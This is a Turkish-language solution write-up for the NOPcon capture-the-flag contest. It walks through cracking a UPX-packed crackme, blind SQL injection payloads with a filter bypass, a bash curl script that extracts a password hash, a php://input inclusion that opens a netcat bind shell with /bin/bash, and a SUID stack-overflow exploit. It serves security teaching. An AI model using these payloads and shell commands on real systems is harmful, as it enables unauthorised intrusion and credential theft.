NOPcon Capture The Flag Çözümleri
|
|
- Ekin Ilkin
- 8 yıl önce
- İzleme sayısı:
Transkript
1 NOPcon Capture The Flag Çözümleri Adım Çözümü İlk adım gerçek hayatta karşılaşılmayacak, dikkat ölçme amacıyla hazırlanmış bir adımdı. Katılımcılardan verdiğimiz iki resim dosyası arasında farkı bulmaları isteniyordu. Geek.jpg resim dosyasının içine bir IP Adresi gizlenmişti; # strings geek.jpg > a.txt ; strings geeks.jpg > b.txt ; diff a.txt b.txt 378,380d377 < 213.p < 128. < Q IP adresine browser ile girildiğinde aşağıdaki mesajla karşılaşılmaktaydı;
2 2. Adım Çözümü Bu adımda katılımcılardan 2.adımda ulaştıkları basit bir crackme uygulamasını cracklemeleri istenmekteydi; Uygulama Click Me butonuna basıldığında yukarıdaki mesajı vermekteydi. Çözüm NSNS ekibi; İlgili IP adresine girdiğimizde bizi "binary.exe" bekliyordu. Öncelikle güvenli bir windows makinada yazılımı çalıştırarak nasıl bir çıktı verdiğini ve yazılımın nasıl davrandığını inceledik. Çıktıyı gördükten sonra yazılımı daha detaylı incelemeye karar verdik. Bu aşamada yazılımı debug ya da disassamble etmeden önce -compress- 'lenmiş olabileceğini düşünerek hexdump çıktısında -compress/pack- izleri aradık; f UPX " e d UPX1...0" d e0 2e d e e d f1 1e e5 UPX!...e7..X f0 5a 93 2f 00 6d 80 0d d b Z./.m...`-.&..B b2 f2 b3 fd 00 1e 68 0b a 1c 0f h.a... $i c e5 e7 76 b7 ec b2 2f c a 1c e4 fa Tl..v.../..b Yukarıdaki satırlara rastladığımızda bu yazılımın UPX ile compress'lendiğini anladık. Daha sonra Aşağıdaki komutu çalıştırarak binary -uncompress- ettik; $ upx -d binary.exe Binary.exe yi OllyDb yazılımı kullanarak çalıştırdık ve binary.exe nin -output- unda gördüğümüz, Crack me Please :( ASCII karakterlerini aradık Aradığımız bu karakterlere ulaşıp bunun referansına ulaştığımızda. cmp / jnz instruction ikilisine rastladık. Bu noktada kodu çalıştırıp basitçe CPU Zero Flag ini toggle edebilirsiniz veya JNZ yi JZ ile yer değiştirebilirsiniz D2F. 75 1D 00402D2F. 75 1D JNZ SHORT binary.00402d4e JZ SHORT binary.00402d4e
3 Yukarıdaki şekilde -crack- işlemini gerçekleştirerek modifiye edilmiş binary.exeyi çalıştırmaya devam ettik ve MessageBox içinde 3. adım ile ilgili link adresine ulaştık; 3. Adım Çözümü NOPcon CTF hacking yarışmasının 3. aşaması 3 adımdan oluşuyordu: Sql enjeksiyon MD5 hash Cracking RFI ile Bindshell İlk olarak portaldaki sql enjeksiyon açığını tespit etmeniz ve daha sonra bu açığı kullanarak elde ettiğiniz md5 hash'i kırarak sisteme giriş yapmanız gerekiyordu. Portala giriş yaptıktan sonra file include açığını tespit edilip sunucuya netcat bağlantısı gerçekleştirilerek ve bu aşama başarı ile tamamlanacaktı. İncelemeye sql enjeksiyon ile başlayalım: Genelde login alanında brute-force ve FI denendi fakat zafiyetin index.php?page=sifremi unuttum sayfası içinde aranması gerekiyordu. Bu sayfada iki tane input alanı mevcuttu. kullanıcı adına göre adına göre adına göre alanı boş bir POST methodu kullanıyordu. Odaklanmamız gereken nokta kullanıcı adına göre kısmıydı.
4 Kullanıcı adına göre ara kısmını Firebug ile incelemeye başlıyoruz. Bu inputun id değerini POST ettiğini görüyoruz. Bir şeyler göndermeyi deneyelim: admin yazdığımız takdirde bize yeşil bir uyarı ekranı getiriyor. Başka bir şey yazdığımızda ise herhangi bir uyarı ekranı almıyoruz. Demekki veritabanında admin adlı bir kullanıcı mevcut. Diğer akla gelen şey ise admin kullanıcısına ait bilgilerin maile gönderilip, gönderilmediğiydi fakat veritabanı işlemi dışında mail gönderme gibi bir aksiyon yoktu. Şimdi bu alana sql enjeksiyon saldırısı gerçekleştireceğiz. Sql enjeksiyon için bir saldırı vektörü tanımlayalım: Method : POST Değişken : id Veri : admin' and '1'='1 Saldırı vektörümüzü string olarak oluşturduk. Datayı POST ettiğimiz takdirde, cevap TRUE olarak dönüyor ve ekranımızda yine sayın admin kullanıcı şifreniz yollandı. yazıyor. Buradan anlıyoruz ki, scriptte Post blind sql injection açığı mevcut. Açığı onaylamak adına Sifremiunuttum.php kaynak kodunu inceleyelim: Sql sorgusu: "SELECT * FROM kullanici WHERE kadi = '$id' ";
5 Saldırı vektörü dahil olduktan sonra: "SELECT * FROM kullanici WHERE kadi = 'admin' and '1'='1'"; Örnekte de gördüğümüz üzere Sql sorgusuna id değişkeni hiç bir filtreden geçmeden dahil oluyor. Sqli'nin varlığından emin olduğumuza göre saldırı vektörümüzü çeşitlendirelim: İlk olarak mysql sürümünü kontrol ediyoruz. False : admin' and substring(version(),1,1)=4 and '1'='1 True : admin' and substring(version(),1,1)=5 and '1'='1 5 değeri true olarak döndüğü için mysql sürümünün 5 olduğunu anladık. Saldırı vektöründe Subselect sorgular kullanacağımız için subselect'in çalışıp çalışmadığından emin olalım: admin' and (select 1)=1 and '1'='1 Çalışmadı! Çalışmamasının sebebinini sifremiunuttum.php kaynak kodlarıyla açıklamaya çalışacağım. if(preg_match('/(select SELECT)/', $id)): exit(); // engelle endif; Kod parçasını anlamaya çalışalım, preg_match fonksiyonu ile eğer gelen veri select veya SELECT olursa exit(); yaparak kodun çalışması engelleniyor. Burada katılımcılar için bir nevi Web Application Firewall simülasyonu oluşturmaya çalıştık. Bu korumayı aşmaya çalışalım ve saldırı vektörünü değiştirelim. admin' and (SeLeCt 1)=1 and '1'='1 Bu saldırı vektörünü kullandığımızda TRUE değeri dönecek. Md5 hash almak için sırasıyla tablo ve kolonları bulmaya çalışalım: admin' and (SeLeCt 1 from kullanici limit 0,1)=1 and '1'='1 Burada kullanici tablosunu tahmin etmemiz gerekiyor bu yüzden mysql5'in bize sunduğu information_schema özelliğini kullanalım Veritabanı ismini alıyoruz; admin' and 1=0 UniON ALL SeLecT '1',DATABASE(),'3
6 çıktı : ctfnopcon_db_ertevbcvb_ Veritabanı ismini kullanarak tablo ismini bulalım: admin' and 1=0 UniON ALL SeLecT '1',group_concat(table_name),'3' FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 'ctfnopcon_db_ertevbcvb_ Çıktı : kullanici Şimdi tablo ismini kullanarak kolon ismini alıyoruz. admin' and (SeLeCt substring(concat(1,sifre),1,1) from kullanici limit 0,1)=1 and '1'='1 sifre kolonunu tahmin ederek bulduk. İşleri kolaylaştırmak için information_schema kullanalım: admin' and 1=0 UniON ALL SeLecT '1', group_concat(column_name), '3' from information_schema.columns group by table_name having table_name='kullanici çıktı : id,kadi,sifre 3 kolonumuz var. Şifre kolonuna odaklanalım ve verileri almaya başlayalım: ASCII tablo eşleşmesini kullanarak deneme-yanılma yöntemiyle yapabiliriz. admin' and ASCII(SUBSTRING((SeLeCt sifre FROM kullanici WHERE id=1),1,1)) = 50 and '1'='1 ASCII tablo: 2 admin' and ASCII(SUBSTRING((SeLeCt sifre FROM kullanici WHERE id=1),32,1)) = 98 and '1'='1 ASCII tablo: b 1. ve 32. karakteri alıyoruz; 2 rakamı ve b harfiymiş fakat bu yöntem oldukça uzun süreceği için kullanabileceğimiz başka bir saldırı vektörü var. admin' and sifre like '2% sifre kolonunda 2 ile başlayan karakterleri buluyor. Tabii ki bununla da tek tek harf ve rakam deneyeceğimiz için basit bir script kodlamamız gerekiyor. #!/bin/bash # CTF katılımcılarından Orhan Albay ın geliştirdiği script. sifre="" for n in {0..31} do for c in {0..9}
7 do res=$(curl --data "id=admin' and sifre like '$sifre$c%" -s " if echo $res grep -q "ifreniz yolland"; then sifre="${sifre}${c}"; echo $sifre; break; fi done for c in {a..f} do res=$(curl --data "id=admin' and sifre like '$sifre$c%" -s " if echo $res grep -q "ifreniz yolland"; then sifre="${sifre}${c}"; echo $sifre; break; fi done done kullanım: chmod +x ornek.sh;./ornek.sh Bu script ile bir kaç saniye içinde hash'i elde edebiliyoruz. Md5 hash : 2e5d49f392b0cd0f27bd56bd7e9eacbb Daha sonra bu hash'i kırmamız gerekiyor. Hash i kırdıktan sonra elde edeceğimiz şifre şu şekilde olmalıydı; Şifre : Şifreyi elde ettiğimize göre portala giriş yapıp son adımı gerçekleştirmemiz gerekiyor. Giriş yaptığımızda ilk dikkatimizi çeken alan index.php?page= oluyor. Çoğu yarışmacı bu alana FI denedi fakat başarılı olamadı. Neden başarılı olamadığını kodlara bakarak anlamaya çalışalım. index.php kaynak kodu: $whitelist = array('giris','sifremiunuttum','iletisim','yonetim','cikis','cikisyap'); if (in_array($_get['page'], $whitelist)) { include($_get['page'].'.php'); } else { include('anasayfa.php');
8 } Kod parçasını incelediğimizde Whitelist yöntemi kullanıldığını görüyoruz. Yani array list içindeki herhangi bir parçayı kullanmadığınız takdirde else bloku devreye girecek ve FI açığı bir işe yaramayacaktır. Bu yüzden bakış açımızı değiştirelim. Page değişkenine gelen değerlerin.php olarak çalıştığını görüyoruz. Demekki sifremiunuttum.php, yonetim.php gibi dosyalarımız var. Bu yüzden burada yapmanız gereken şey cikisyap.php içindeki RFI açığına odaklanmaktı. Cikis.php kaynak kodlarını inceleyelim: if(!preg_match('/(php:\/\/input)/', $_GET['page'])): exit(); // engelle endif; Yine bir regex kontrolü gerçekleştirdik. Eğer page değişkeni php://input değilse kodun çalışması durduruluyor. Kısacası php shell vs. elde etmeniz mümkün olmuyor. Devam edelim, Firefox eklentisi olan Hackbar'ı açıyoruz ve load url yapıyoruz. Php://input post methoduyla çalıştığı için enable post data diyoruz. POST DATA alanına system fonksiyonumuzu ve çalıştıracağımız komutu yazıyoruz. Sunucu da netcat kurulu olduğu için ilk olarak nc deneyeceğiz. nc -l -p e /bin/bash yazarak portu monitör etmeye başlıyoruz ve yüklemeye başlayınca Netcat ip port komutuyla bağlanmaya çalışıyoruz ve www-data kullanıcısıyla içerde olduğumuzu görüyoruz;
9 Tebrikler, 3. aşamayı da tamamlamış olduk :) 4. Adım Çözümü Son adım katılımcılardan /tmp dizini altında bulunan suidbit değeri atanmış exploitme uygulamasını istismar edip, root hakları elde etmeleri istenmekteydi. exploitme uygulaması NX disable olarak derlenmiş ve sistemde ASLR dışında hiçbir protection bulunmamaktaydı; Uygulama iki parametre almaktaydı. İlk argüman güvenli fonksiyon strncpy ile kopyalanırken, ikinci argüman strcpy ile kopyalanmaktaydı;
10 Aşağıdaki resimde görüldüğü gibi, ikinci argümana uzun bir input girildiğinde uygulama crash olmaktaydı; Uygulamayı iki kere çalıştırarak $esp registerının değerine baktığımızda, ASLR protection ını görebiliriz;
11 Aslında binary içine katılımcıların işini kolaylaştırmak için inline assembly olarak bir adet jmp esp instruction ı eklenmişti Dolayısıyla binary içinde jmp esp opcode larını aratan yarışmacılar bu adımı kolaylıkla geçebileceklerdi. Diğer yöntem ise ASLR yi brute force yaparak bypass etmekti. Binary içinde jmp esp instructionını bulduktan sonra, kısaca yapılması gereken /bin/sh shellcode umuzu stack e yazıp, jmp esp nin binary içindeki offsetini de EIP işaretçisinin üzerine yazarak, uygulamayı exploit etmekti.
12
BLIND SQL INJECTION SALDIRILARI
SALDIRILARI Emre Karadeniz OSCP İçindekiler BTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri I. Blind SQL Injection (Content Based)... 2 II. Blind SQL Injection (Content-Based) Örneği... 3 III. Blind
DetaylıBölüm 10: PHP ile Veritabanı Uygulamaları
Bölüm 10: PHP ile Veritabanı Uygulamaları -231- Öğr.Gör. Serkan DİŞLİTAŞ 10.1. PHP PHP, platformdan bağımsız sunucu taraflı çalışan betik bir web programlama dilidir. PHP programlama dili ile MySQL, MSSQL,
DetaylıSAMURAİ FRAMEWORK İLE HACKİNG-1 (FOOTPRINTING)
SAMURAİ FRAMEWORK İLE HACKİNG-1 (FOOTPRINTING) Merhaba arkadaşlar. Samurai Framework ile Temel Hacking makale serisinin ikinci kısmını bu ve devamında ki makalelerimizde inceleyeceğiz. Bu makalemizde temel
DetaylıİNTERNET PROGRAMCILIĞI 2 10. HAFTA MYSQL - PHPMYADMIN. Hazırlayan Fatih BALAMAN. İçindekiler. Hedefler. Mysql Nedir.
İNTERNET PROGRAMCILIĞI 2 10. HAFTA İçindekiler MYSQL - PHPMYADMIN Mysql Nedir PhpMyAdmin Nedir PhpMyAdmin Arayüzü Hedefler Mysql' in görevini söyleyebilir PhpMyAdmin' in kullanım amacını söyler Hazırlayan
Detaylı05 - Veritabanı Sızma Testleri
BGM 531 - Sızma Testleri ve Güvenlik Denetlemeleri Bilgi Güvenliği Mühendisliği Yüksek Lisans Programı Dr. Ferhat Özgür Çatak ozgur.catak@tubitak.gov.tr İstanbul Şehir Üniversitesi 2018 - Güz İçindekiler
DetaylıASP.NET 1. DURUM YÖNETİMİ. BLM 318 e-ticaret ve Uyg. Durum Yönetimi Nedir? Durum Yönetimi: Karșılaștırma İÇERİK. Sunucu-taraflı Durum Yönetimi
Nedir? olmadan Login.aspx Bilgilerinizi giriniz Durum Yönetimi İle Login.aspx Bilgilerinizi giriniz Adınız Adınız Pınar Pınar Soyadınız Soyadınız Onay Durdu Onay Durdu Gönder Gönder ASP.NET - 1 sayfa.aspx
DetaylıArmitage Nedir? Kullanım Öncesi
Armitage Nedir? Armitage, metasploit veritabanını kullanan grafiksel bir test / saldırı araçlarından bir tanesidir. Armitage metasploit veritabanlarını kullanması nedeniyle hedef sistemin bilgilerine göre
DetaylıRPMNET WOLVOX REPORTER
RPMNET WOLVOX REPORTER TANITIM : EFAR YAZILIM LTD.STI Tarafından Geliştirilen EFAR Wolvox Reporter AKINSOFT Wolvox Kullanıcılarının Android İşletim Sistemi Yüklü Cep Telefonlarından Online Olarak Kullandıkları
DetaylıKabuk Programlama (Bash)
Kabuk Programlama (Bash) Erkan Esmer Ocak, 2013 İçindekiler 1 Giriş.................................................... 2 2 Kabuk(Shell)............................................... 3 3 Çekirdek(Kernel).............................................
Detaylıİnternet Programcılığı
1 PHP le Ver tabanı İşlemler Yaptığımız web sitelerinin daha kullanışlı olması için veritabanı sistemleri ile bağlantı kurup ihtiyaca göre verileri okuyup yazmasını isteriz. 1.1 Veritabanı Nedir? Veritabanı
DetaylıKurumsal Güvenlik ve Web Filtreleme
S a y f a 1 antikor Kurumsal Güvenlik ve Web Filtreleme SshClient, Putty v.s. S a y f a 2 S a y f a 3 Yönetici olarak AntiKor a girmek için SshClient veya Putty programı kullanılır. IP olarak kurum içinden
DetaylıPHP ile İnternet Programlama
PHP ile İnternet Programlama Doç.Dr. Gazi Üniversitesi Gazi Eğitim Fakültesi Bilgisayar ve Öğretim Teknolojileri Eğitimi Bölümü 5. BÖLÜM: Oturum Yönetimi ve Güvenlik Sayfaya Yönlendirme PHP sayfamızdan
DetaylıJ-Guar Self Servis Kurulumu
Self Servis Kurulumu Logo Şubat - 2014 İçindekiler J-Guar Self Servis Kurulumu... 3 1. Apache Web Server Kurulumu... 3 2. PHP Kodlarının WebRoot a Yerleştirilmesi... 8 3. Proje Genel Ayarları... 10 Versiyon
DetaylıKurumsal Güvenlik ve Web Filtreleme
S a y f a 1 antikor Kurumsal Güvenlik ve Web Filtreleme SshClient, Putty v.s. S a y f a 2 S a y f a 3 S a y f a 4 S a y f a 5 S a y f a 6 S a y f a 7 şeklini alır. Bu durumda kullanıcı yasaklı konumdadır.
DetaylıPHP 1. Hafta 2.Sunum
PHP 1. Hafta 2.Sunum Hello World Bu derste görülecekler WAMP ve PHP Hosting kavramı ve bizi neden ilgilendirmediği Domain ve localhost kavramları www klasörü İlk PHP kodunun
DetaylıXSS Exploitation via CHEF
XSS Exploitation via CHEF Evren Yalçın SignalSec Corp. www.signalsec.com GİRİŞ Xss zafiyetlerini exploit ederken genelde Beef(The Browser Exploitation Framework) aracı kullanılmaktadır. Fakat ek araçlar
DetaylıLOGO için Online Mutabakat Kullanım Kılavuzu
LOGO için Online Mutabakat Kullanım Kılavuzu LOGO Windows Ürünleri için Online Mutabakat LOGO Java Ürünleri için Online Mutabakat Microsoft Excel veri kaynağı için Online Mutabakat Microsoft SQL Server
DetaylıSQL Uyarı Programı Kurulum ve Kullanımı
SQL Uyarı Programı Kurulum ve Kullanımı Kurulum 1. SQL Uyarı.zip dosyası açılır. 2. SQL Uyarı.exe programı çalıştırılır. 3. Üstteki ekran açılır ok. Butonuna basılır. 4. Ayarlar ekranı seçilir. 4.1 Server
DetaylıCODEIGNITER SEMINERI KÜTÜPHANE YAZMA GÜVENLIK ÖNLEMLERI CODEIGNITER 2.0
CODEIGNITER SEMINERI KÜTÜPHANE YAZMA GÜVENLIK ÖNLEMLERI CODEIGNITER 2.0 Özgür Web Teknolojileri Günleri 2010 Yeditepe Üniversitesi, Airties Salonu 16 Ekim 2010 (14:00 14:45) Fatih BAZMAN (http://codeigniter.gen.tr)
DetaylıExploit.CVE-2012-0003 Analizi
Exploit.CVE-2012-0003 Analizi Celil ÜNÜVER cunuver [at] signalsec.com www.signalsec.com Hackerların yer altı dünyasında Patch Tuesday, Exploit Wednesday diye bir söz vardır. Microsoft Salı günü yamaları
DetaylıSadece 2 İstekle MySQL Blind SQL Injection. Canberk BOLAT canberk.bolat[-at-]gmail[-dot-]com
Sadece 2 İstekle MySQL Blind SQL Injection Canberk BOLAT canberk.bolat[-at-]gmail[-dot-]com 0x01 Giriş Bu yazı blind sql injection saldırılarında tek bir karakter için minimum istek ile doğru sonuca varabilmek
Detaylıe-imzatr Kurulum Klavuzu
e-imzatr Kurulum Klavuzu Sürüm 0.0.1 İçindekiler İşletim Sistemi Sistem Türü Öğrenme Java yükleme Akis Kurulum Kullanıcı Doğrulama İşletim Sistemi Sistem Türü Öğrenme Bu başlıkta bilgisayarımızın mevcut
DetaylıKANTAR UYGULAMASI Kurulum Kılavuzu
KANTAR UYGULAMASI Kurulum Kılavuzu Serhat Öztürk Medyasoft Danışmanlık ve Eğitim A.Ş. v.1.0 Kantar Uygulaması üç temel parçadan oluşur. Veritabanı, WCF servisi ve Masaüstü uygulaması. Bu nedenle sistemde
DetaylıJasperReports Server ve Ireport raporlama Sistemi Kurulumu / Kullanımı 1. Bölüm 2. Bölüm 1- JasperReports Server ve Ireport Nedir?
JasperReports Server ve Ireport raporlama Sistemi Kurulumu / Kullanımı 1. Bölüm 1.1- JasperReports Server ve Ireport Nedir? 1.2- JasperReports Server ve Ireport Kurulumu 1.3- JasperReports Server Genel
DetaylıLOGO için Online Mutabakat Kullanım Kılavuzu
LOGO için Online Mutabakat Kullanım Kılavuzu SQL Bağlantı Bilgileri Server : Kullanıcısı : Şifre : Veri Tabanı : LOGO ürünü veri tabanının barındırıldığı MS SQL sunucu adı. LOGO ürünü veri tabanına bağlantı
DetaylıWindows 7 - IIS 7.5 üzerine PHP ve MySQL kurulumu
Windows 7 - IIS 7.5 üzerine PHP ve MySQL kurulumu Not: "Aşağıdaki anlatım Windows 7 64 bite göredir. 32 bit kullanıyorsanız MySQL 32 bit versiyonunu yükleyiniz." Windows 7 (64 bit işletim sistemi) ve IIS
DetaylıASP.NET ile Bir Web Sitesi Oluşturma
29,30 Eylül 2011 ASP.NET ile Bir Web Sitesi Oluşturma ASP.NET sitesi oluşturmak için File menüsündeki, New açılır listesindeki, Web Site komutuna tıklıyoruz Açılan pencereden C# içindeki ASP.NET Web Site
DetaylıVERİ GÜVENLİĞİ. Web Uygulamaları Güvenliği. Özer Çelik Matematik-Bilgisayar Bölümü
VERİ GÜVENLİĞİ Web Uygulamaları Güvenliği Özer Çelik Matematik-Bilgisayar Bölümü Http nedir? HTTP (İngilizce Hypertext Transfer Protocol, Türkçe Hiper Metin Transfer Protokolü) bir kaynaktan dağıtılan
DetaylıNP301. K&K NP301 Sanal COM portu tanımlama adımları ADIM-1
NP301 ADIM-1 NP301 ilk konfigürasyonu için; öncelikle bilgisayarınızın ethernet portu ile NP301 cihazın ethernet portunu düz ağ kablosu ile birbirine bağlayın. Bilgisayarınızın ağ ayarlarını otomatik şekle
DetaylıŞehmus POLAT Teknoloji Fakültesi
Şehmus POLAT Teknoloji Fakültesi Elektrik-Elektronik Mühendisliği CTF Nedir? Capture the Flag (Bayrağı yakala), siber güvenlik alanında düzenlenen ve katılımcıların; kriptoloji, tersine mühendislik, log
DetaylıİNTERNET PROGRAMCILIĞI DERSİ ÇALIŞMA SORULARI
İNTERNET PROGRAMCILIĞI DERSİ ÇALIŞMA SORULARI 1) Aşağıdaki seçeneklerin hangisinde PHP kod yazımı doğru olarak verilmiştir? A) B) C).. D) 2) PHP ile hazırlanmış
DetaylıHP Yazılım Zirvesi - İstanbul 20 May 2015 - Wyndham Grand Levent Erdem Alaşehir / Finansbank Güvenlik Olay Korelasyonunda Büyük Veri Kullanımı
HP Yazılım Zirvesi - İstanbul 20 May 2015 - Wyndham Grand Levent Erdem Alaşehir / Finansbank Güvenlik Olay Korelasyonunda Büyük Veri Kullanımı Ajanda Mevcut Durum Vertica ile Çözüm Analiz Mevcut Durum
DetaylıV14xx Güncelleme İşlemleri
V14xx Güncelleme İşlemleri İnternet tarayıcınızdan www.mikro.com.tr web adresine giriş yapınız. Mikro web sayfasında arşivleri (exe) indirmek için MİKROCRM ikonunu mouse ise seçiniz. Açılan sayfada Kullanıcı
DetaylıTurquaz Windows kurulum dökümanı. ftp://ftp.mirror.ac.uk/sites/ftp.postgresql.org/binary/v7.3.1/windows/pgsql731wina1.exe
1. Giriş Turquaz programını windows üzerinde çalıştırmak için öncelikle bilgisayarınızda postgresql ve Java nın kurulu olması gerekli. Aşağıdaki bilgi ve dökümanlar windows 2000 işletim sistemi üzerinde
DetaylıWeb Uygulama Pentest Eğitimi
Web Uygulama Pentest Eğitimi Konu: Girdi Denetimi @2014 Örnek Eğitim Notu bilgi@bga.com.tr Girdi Denetimi Uygulama kullanmadan önce bütün güvensiz verilerin doğru bir şekilde denetlenmesidir. Bir çok saldırı
DetaylıUzem Öğrenci Girişi. Şekil 1
Uzem Öğrenci Girişi Sisteme öğrenci olarak giriş yapabilmek için http://uzem.uskudar.edu.tr adresini internet tarayıcımızın adres satırına yazdıktan sonra bizi ilk resimdeki gibi bir ekran karşılıyor.
DetaylıINTERNET BAĞLANTISININ KURULMASI İÇİN GEREKLİ YÖNLENDİRİCİ AYARLARI
INTERNET BAĞLANTISININ KURULMASI İÇİN GEREKLİ YÖNLENDİRİCİ AYARLARI Not: Bu klavuza geçmeden önce, ürününüzün paketinden çıkan Hızlı Kullanım Klavuzu nda açıklanan adımları gerçekleştiriniz. Internet Bağlantısının
DetaylıBaşlangıç Ayarları. www.trippersoft.com
Başlangıç Ayarları www.trippersoft.com Tripper > Kullanıcı Ayarları 1 LOGO Sys de TRİPPER kullanacaklar için birer kullanıcı açıyoruz. (Bu kullanıcıların her biri için LOGO programı içinde SATIŞ ELEMANI
Detaylı1. Bilgisayarınızda kullandığınız Web tarayıcı programını (Internet Explorer, Mozilla Firefox vb.) çalıştırınız.
VLAN Yapılandırma Değerli Müşterimiz, VLAN özelliği ile yerel ağınızı segmentlere ayırarak bölebilir ve aynı ağ geçidini kullanarak internete çıkabilen bu segmentlerin birbirlerine erişimlerini engelleyebilirsiniz.
DetaylıCoslat Monitor (Raporcu)
Coslat Monitor (Raporcu) Coslat Monitor, Coslat Firewall, Hotspot ve Mirror uygulamalarında oluşturulan zaman damgalı kayıtların analiz edilmesini ve raporlanmasını sağlayan uygulamadır. Coslat Monitor
DetaylıProgram Kurulum. Turquaz Muhasebe. İçindekiler
Program Kurulum Turquaz Muhasebe İçindekiler İÇİNDEKİLER 1 1. TEK KULLANICI 2 2. AĞ KURULUMU 4 2.1 VERİTABANI SERVER KURULUMU 4 2.2 VERİTABANI SERVER AYARLARI 11 2.3 DATALARIN YÜKLENMESİ 11 2.4 İSTEMCİ
DetaylıİÇİNDEKİLER. İçindekiler. Web Uygulama Güvenliği Örnek Kaynak Kod Analizi
İÇİNDEKİLER İçindekiler Yazar Hakkında...2 Web Uygulama Güvenliği Kod Analizi...3 Çalışma Ortamı Ve Zafiyetli Web Uygulaması...4 Uygulamaya Giriş...5 Muhtemel Girdi Noktalarının Arayüzde Saptanması...6
DetaylıVeri Tabanı Yönetim Sistemleri Bölüm - 02
Veri Tabanı Yönetim Sistemleri Bölüm - 02 İçerik Web sunucusunun yapılandırılması için gerekli yazılımların temini Yazılımlarının sunucuya yüklenmesi Ön test Uygulama yazılımlarının yapılandırılması Son
Detaylıe-imzatr Kurulum Klavuzu
e-imzatr Kurulum Klavuzu Sürüm 0.0.1 1 İçindekiler İşletim Sistemi Sistem Türü Öğrenme Java yükleme Akis Kurulum Kart Okuyucu Sürücü Kurulum Kullanıcı Doğrulama 2 İşletim Sistemi Sistem Türü Öğrenme Bu
DetaylıPhp İle Mysql Veritabanından Bilgi Çekme
Mysql_fetch_assoc, mysql_fetch_row, mysql_fetch_object, mysql_fetch_array ve mysql_result metodları Uygulamada kullanacağımız veritabanı Veritabanı: kitaplik Tablo: kitaplar isbn adi yazari 944503382 Adım
DetaylıHer Yönüyle SQL Enjeksiyonu. OWASP-Türkiye Bünyamin Demir
Her Yönüyle SQL Enjeksiyonu OWASP-Türkiye Bünyamin Demir Bünyamin Demir ( @bunyamindemir ) OWASP Türkiye Bölüm Lideri Founder & CTO @ Enforsec Ltd. Sızma Testleri Uzmanı Web, Mobil, Network, SCADA, Wireless,
DetaylıSqlmap pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır.
SqlMap Kullanımı Sqlmap pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır. Temel olarak yaptığı işlem sizin belirtmiş olduğunuz parametrelere göre hedef
DetaylıAndroid Ders Notları
Android Ders Notları 1. Yeni Bir Proje Başlatma Android Studio programında yeni bir proje başlatıyoruz. İlk olarak karşımıza resim 1 deki gibi bir pencere gelecek. Burada Application name kısmına proje
DetaylıOrtamınızda A.D. veya LDAP sistemi var ise aşağıdaki linkten KoruMail LDAP-AD isimli dokümanı inceleyebilirsiniz.
KoruMail, kullanıcı doğrulama işlemi için herhangi bir dizin sunucu (MS Active Directory, Novell edirectory, Sun Directory Server, OpenLDAP) olmadığı durumlarda kullanıcıları dizin sunucu yerine, MySQL
DetaylıTanımı 46 2-4-6 Problemi 46 Şüpheci Yaklaşım 47 Tamsayı Taşması (Integer Overflow) 47 Tamsayı Taşması Java Uygulaması 48
1 Yazılım Güvenliği 2 Yazılım Güvenliği Olgunluk Modelleri 4 OpenSAMM 6 Tehdit Modelleme 7 Güvenli Kod Denetimi 8 Statik Kod Analizi 9 Sızma Testleri-Pentest 10 13 Ne Kadar Karmaşık Olabilir ki? 14 HTML
DetaylıBu makalede 2003 sunucu, Windows 2003 Server anlamına gelmektedir. Aşağıda yapılan işlemler 2003 R2 sunucu üzerinde denenmiş ve çalıştırılmıştır.
WINDOWS 2003 SUNUCULARI ÜZERĐNE PHP YÜKLENMESĐ ERDAL YAZICIOĞLU erdal(at)gmail.com http://barbarossa41.wordpress.com Merhabalar, Çözümpark.com adresinde bir kullanıcı ASP ve PHP yi aynı sunucu üzerinde
DetaylıBLGM 354 DENEY 1 * GİRİŞ
BLGM 354 DENEY 1 * GİRİŞ Amaçlar 1. Oracle istemcisi kurulumu 2. Veritabanı bağlantısı 3. SQL geliştirme ortamında çalışma Oracle İstemcisinin Kurulumu Oracle istemcisi bölümün FTP sunucusundan (ftp://ftp.cmpe.emu.edu.tr)
DetaylıPERKON PDKS Kurulum ve hızlı başlangıç rehberi
Oluşturma 02.11.2015 Revizyon: 19.01.2016 Rev. No: 03 Yazan: Süleyman FAKİR Düzenleyen: F. DELİRİ PERKON PDKS Kurulum ve hızlı başlangıç rehberi 1) PDKS Kurulumu, Lisans Onaylaması Ve Veri Tabanı Ayarları
DetaylıJavascript. 1) Notepad++ aşağıdaki kodları yazıp deneme.html olarak kaydedelim. 2) Biraz önceki sayfa sadece html kodların içeriyordu.
Javascript Html sayfalarının içine yazılarak, sayfayı daha etkileşimli hale getirir. click olayları, uyarı mesajları gibi hareketlerle sayfayı daha dinamik hale getirir. Javascript olmadan yazılan html
DetaylıKurulum 14 FTP ye Bağlanmak ve Dosyaları Atmak 14 Veritabanı Oluşturulması ve Bağlanıp Kurulumun Tamamlanması 15
vii 1 İçerik Yönetim Sistemi Nedir? 2 WordPress Nedir? 2 WordPress Kısa Tarihi 3 WordPress Gücünü Nereden Alıyor? 3 WordPress ile Neler Yapabiliriz? 4 Kişisel Blog 4 Kurumsal Blog 4 Kurumsal Site 4 Tanıtım
DetaylıOKUL HABER EKLEME MODÜLÜ TANITIM DOSYASI. Okul haberlerinizi ilçemiz web sitesinde yayınlayabilmek için aşağıdaki adımları uygulamanız gerekmektedir.
OKUL HABER EKLEME MODÜLÜ TANITIM DOSYASI Okul haberlerinizi ilçemiz web sitesinde yayınlayabilmek için aşağıdaki adımları uygulamanız gerekmektedir. http://maltepe.meb.gov.tr/mebpanel adresine giriniz.
DetaylıDinamik Kodlama. [X] Fusion@6. [X] Yeni Fonksiyon
Dinamik Kodlama Ürün Grubu Kategori Versiyon Önkoşulu [X] Fusion@6 [X] Yeni Fonksiyon @6 Uygulama @6 Serisi ürünlerde, kullanıcı arabirimlerinin her yerine eklenen dinamik kodlama özelliği ile, programın
DetaylıÖğr. Gör. Serkan AKSU http://www.serkanaksu.net. http://www.serkanaksu.net/ 1
Öğr. Gör. Serkan AKSU http://www.serkanaksu.net http://www.serkanaksu.net/ 1 JavaScript JavaScript Nedir? Nestcape firması tarafından C dilinden esinlenerek yazılmış, Netscape Navigator 2.0 ile birlikte
Detaylı(W)eb (A)pplication (F)irewall Bypass http://www.bga.com.tr bilgi@bga.com.tr
